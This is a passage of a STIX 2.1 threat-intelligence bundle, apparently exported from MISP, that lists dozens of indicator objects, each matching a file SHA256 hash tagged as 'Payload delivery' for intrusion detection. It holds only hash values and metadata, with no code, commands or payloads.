"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db697b-6cf4-47ab-9888-42ec950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '320183fca03a973f746adba3e5bdac62be152bc4d32c6cf466383cd951ec2560']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db697c-97b0-48b5-84ef-4250950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '206c8c6f0bf5792631387b823cb4c1682041805b5c3241cd6d700c6e5475066b']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db697d-9ae8-483d-a894-4d9e950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'b33e64b53c8f4af8e8cc75feb2de709da7614082ffd19f7a2110eb1b8b8ab546']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db697e-35c8-4e4a-a9c7-4f32950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '31f6399b3423324eea084964bd979689bb367021b424e264f32c3787bfce85e7']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db697f-eb34-4075-8fac-43ae950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '4a1dcecd71ff7323eb3d0b1bcfc4d61b859e7734fcaa33b01bc3b727557b4d52']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6980-855c-42cc-a42c-4674950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'c2b5a2df6b792edac0d491a643cb525012f959934ba7a1846e14e51c810d8d42']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6981-3534-4b92-b53d-4b5f950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'ff5c86f1287d1b8ffc5822792ac00255176d706859749b7f2d4baef49f1f833a']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6982-72ec-49bd-a685-4e6e950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'dfa8a776451866e2773d57f79a839b2baddbf50792794993bdcefd0631c3f9b3']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6983-70c4-4edf-aae8-4b0a950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '2977ecd28f44130c0afec70578b1c4fe240e39ad201d2ddd7fe1d9c2bd1330a2']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6983-0dd4-4f5b-8cd1-4bbd950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '5e0612a0124b15e193f630346800aee5307477110a5d4f8df23fc41d1d451387']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6984-f7e0-4088-be90-4bfb950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'b39ffb21bcba526d3ee503bcfdd18aee2a2bdec4b0798c6648fd3f25f3d78bb5']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6985-efe4-4cf3-bceb-4ed4950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'b86f42f252d586d032ee0e4022585c457f98f667bbe9f2f4ba4d53e6f34537fa']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6986-0b88-48cb-aa93-4073950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'b30f53594e7e4b21a54c4011d67b2075185ca1b53084078b624341a8ab906702']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6987-f7e4-4872-9f9a-4d01950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '7e83122da3f7152a5a03deca48dd600315b1c8c285c9e5922e7d691d6afe0f4f']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6988-5dc4-4a0e-9c1b-4cf1950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '271431e7eb1c89b52ffb154912925dcf9fc4210fa91a2b4c27f27037f1bc9e02']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6989-9fb4-4542-b2da-4c7a950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'f98ac9b51c9395ed3d28dbfae6116b2f753dfec679223c6a4f9dac948a0e95a8']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db698a-d358-40f7-9c86-4f6e950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'cc60033583227cda159007add0b3274f5752195bdae47495ee49d299b0a39ff4']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db698b-8234-418e-9f7d-4b92950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '0299289e2146e4655a8ba43191243dafab24023dafa857eaf82ed3ef423013a8']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db698c-43e0-449e-828b-4f2d950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '63f1f839dbac88b1ad4022e152379d3d909f30eaf34d08b3c459f16845082c94']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db698d-f5f4-481c-8c67-4586950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'b7bf2ad207ac67e422bc69ec0058fb21a8f52061b564e1ef565887eaf3dd1dca']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db698e-7ff0-4014-8910-4ac1950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'd9c2be7b02dcf65889d764ba4ebf9908672c2a234cb4291d89826ff749909623']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db698f-962c-4bf0-958a-4b2d950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'ca752bfec0b9f14a36c69e0c90edcc846f67923ae81ef5c5719480aecbbedff9']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6990-6d90-4066-8251-42a7950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'd23d4055c99b7bd3581a83443d934c95d2ec8dd9c690ba29b611e64587add39f']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6991-5684-4a23-af26-413b950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'dd4d9ff987aaa9f2bdf526207a97d7182ef3be37fa08591a40e9bdcb8937c2d4']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6992-9d64-4759-927e-4588950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'e3feff7f25d06c8e01d62d76a5f6272fa92f41ae05e0fbff51b67b9cc55cf452']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6993-e718-40e5-b1ca-45e3950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '00b3dcdeed117b8eaefff05246114c2ca49e88b3ccbac073c5cd87318e215f37']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6994-7b00-45e9-9981-4d03950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '34084bc57ca269c05ef65720bc39d8bd284000316242721982f4538af351852a']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6995-bb98-4e4e-becb-4faa950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'df4e6982fe1977a49e37239b2d28a60b39317eb8dcb3e383c74b70fa62007b47']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6996-d2c0-4e13-a6f4-4e88950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '221302051095909ea47eac8ac8b9bcc82c51bab6946aca7c8822aee732fbee30']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6997-6834-407d-abd8-475f950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '0205f46daf74ac9a66ac89dad04b805528656e482f452e616e9f260f1ec6f710']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6998-1d4c-4602-8a38-442a950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = '09cef29d19f76796b6effae5d6e193efc98c9e1e9e6523566ec995a78daf3dfc']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6999-ab24-4113-83a0-43e1950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "sample",
|
|
"pattern": "[file:hashes.SHA256 = 'ef704e0118c5935e0afd4632d10c1ef1e69ae026e73fcdc9d9b272db50a8aeba']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
